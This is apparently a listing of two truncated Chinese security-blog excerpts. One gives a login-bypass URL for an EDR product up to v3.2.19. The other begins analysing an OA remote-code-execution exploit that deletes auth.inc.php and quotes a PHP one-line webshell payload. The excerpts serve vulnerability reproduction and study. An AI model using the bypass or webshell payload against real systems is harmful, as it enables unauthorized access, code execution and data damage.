z1feiyu

影响范围: EDR <= v3.2.19 漏洞描述： 终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。 0x01 漏洞复现 /ui/login.php?user=username username 可能会有变动需要f...

hvv爆出rce按照网上exp进行复现成功获取shell，复现方式自行搜索（很多） 比较好奇 为什么要删除文件 这里从exp着手分析 import requests target="http://192.168.159.137:8080/" payload="<?php eval($_POST['agan']);?>" print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")